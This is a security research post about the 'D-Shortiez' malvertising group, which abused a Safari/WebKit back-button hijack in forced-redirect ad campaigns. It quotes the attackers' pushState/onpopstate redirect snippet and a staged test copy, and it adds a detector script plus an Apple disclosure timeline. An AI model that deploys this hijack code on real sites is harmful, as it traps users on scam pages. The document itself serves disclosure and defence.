Malvertiser “D-Shortiez” abuses WebKit back button hijack in forced-redirect campaign

Eliya Stein
Confiant
Feb 8, 2023

Over the last few years, as AdTech and browser security have continued to mature, many malvertisers have moved on from forced redirect campaigns that target premium publishers and top-tier advertising platforms. The ones that remain, however, typically employ little tricks to gain some sort of positional advantage that optimizes their impact and reach.

Today we are looking at part of a payload from a threat actor that we call D-Shortiez, a group that runs forced redirect campaigns that propel victims down familiar malicious click-chains, which surface familiar scams like this:

The redirect payload itself consists mainly of largely unremarkable fingerprinting and tracking functions:

When we come across redirect campaigns like this, we like to pay extra attention to the actual redirect mechanics in order to see if anything weird is going on.

Starting on line 211 we see a nested try/catch that attempts the actual forced redirection. This is all fairly standard: different browsers respond differently to different redirect attempts, and the bad actors have learned that throwing the kitchen sink at it maximizes the chances of a successful redirection.

The part that made us pause and closely consider what’s happening here is these few lines:

if (!!(window.top.history && window.top.history.pushState)) {
    window.top.history.pushState(null, null, '');
    window.top.onpopstate = function(event) {
        window.top.location.href = redirectUrl + 'back';
    };

A description of the popstate event from MDN:

The popstate event of the Window interface is fired when the active history entry changes while the user navigates the session history. It changes the current history entry to that of the last page the user visited or, if history.pushState() has been used to add a history entry to the history stack, that history entry is used instead.

We staged our own payload for testing as follows and tried it on all the browsers with major market share:

redirectUrl = 'http://google.com/search?q=';
if (window.top.history && window.top.history.pushState) {
    window.top.history.pushState(null, null, '');
    window.top.onpopstate = function (event) {
        window.top.location.href = redirectUrl + 'back';
    };
    let u1 = redirectUrl + 'click';
    window.top.document.body.addEventListener('click', function () { window.top.location.href = u1; }, true);
}

We found nothing unusual while testing this snippet in almost every browser, but something stood out about Safari…

The script very effectively acts as a back button hijack, comparable to some of the browlock (browser locker) techniques that online scammers have leaned on over the years. Victims are lured to scams, and the neutralized back button keeps them from being able to back out of the site.
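To make the mechanic concrete from the defensive side, here is an added example (not Confiant's code and not part of the payload) that runs a creative's script against a constructed window shim in Node.js, simulates the Back button, and reports whether the popstate handler navigates the top frame. The shim, the sample scripts and the hostnames in them are all constructed for illustration.

```javascript
// Added example, not Confiant's code: an instrumented window shim for Node.js that
// runs an ad creative's script offline, then simulates the Back button and records
// whether the popstate handler navigates the top frame (the hijack described above).
function makeWindowShim(pageUrl) {
  const log = { pushStates: [], navigations: [], clickCaptures: 0 };
  const location = {
    get href() { return pageUrl; },
    set href(v) { log.navigations.push(String(v)); pageUrl = String(v); },
  };
  const history = { pushState(state, title, url) { log.pushStates.push(url); } };
  const body = {
    addEventListener(type, fn, capture) { if (type === 'click' && capture) log.clickCaptures++; },
  };
  const win = { history, location, document: { body }, onpopstate: null };
  win.top = win; // the creative asks for window.top; the shim pretends to be the top frame
  return { win, log };
}

function sameOrigin(a, b) { return new URL(a).origin === new URL(b).origin; }

// Returns a verdict object; `hijack` is true when a dummy history entry is pushed
// and pressing Back (popstate) triggers a cross-origin top-frame navigation.
function analyzeCreative(src, pageUrl = 'https://publisher.example/article') {
  const { win, log } = makeWindowShim(pageUrl);
  new Function('window', src)(win);          // run the creative against the shim
  const dummyEntry = log.pushStates.some((u) => u === '' || u == null);
  const before = log.navigations.length;
  if (typeof win.onpopstate === 'function') win.onpopstate({ state: null }); // simulate Back
  const backNav = log.navigations.slice(before);
  const crossOrigin = backNav.some((u) => !sameOrigin(u, pageUrl));
  return { dummyEntry, backNav, clickCaptures: log.clickCaptures, hijack: dummyEntry && crossOrigin };
}

// Constructed sample reproducing the pattern in the post (redirect target is a placeholder).
const HIJACK_SAMPLE = `
  var redirectUrl = 'https://redirect-target.example/?q=';
  if (window.top.history && window.top.history.pushState) {
    window.top.history.pushState(null, null, '');
    window.top.onpopstate = function () { window.top.location.href = redirectUrl + 'back'; };
    var u1 = redirectUrl + 'click';
    window.top.document.body.addEventListener('click', function () { window.top.location.href = u1; }, true);
  }`;

// Constructed benign sample: an in-page router that uses the same APIs legitimately.
const BENIGN_SAMPLE = `
  window.history.pushState({ step: 2 }, '', '/article?step=2');
  window.onpopstate = function (e) { window.rendered = e.state; };`;

console.log(analyzeCreative(HIJACK_SAMPLE));   // hijack: true
console.log(analyzeCreative(BENIGN_SAMPLE));   // hijack: false
```

The verdict deliberately requires both signals (a dummy entry with an empty URL and a cross-origin navigation on Back), so ordinary single-page routing that uses pushState with a real path is not flagged.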

Impact, Scope, & Targeting

Over the last 6 months, D-Shortiez have served over 300MM malicious ad impressions targeting primarily US audiences with a long tail that trickles down to Canada and Europe.

While activity has been fairly consistent since August, if we look at it on a trend line, we can see some very aggressive sustained bursts, and some breaks in between.

The predominantly targeted platform is iOS.

Timeline

Sep. 29 — Reported to Apple

Jan. 23 — Addressed with this Safari security update: https://support.apple.com/en-us/HT213600

IOCs


Technology, Security, and Blockchain Enthusiast. Security Engineering & Research @ Confiant.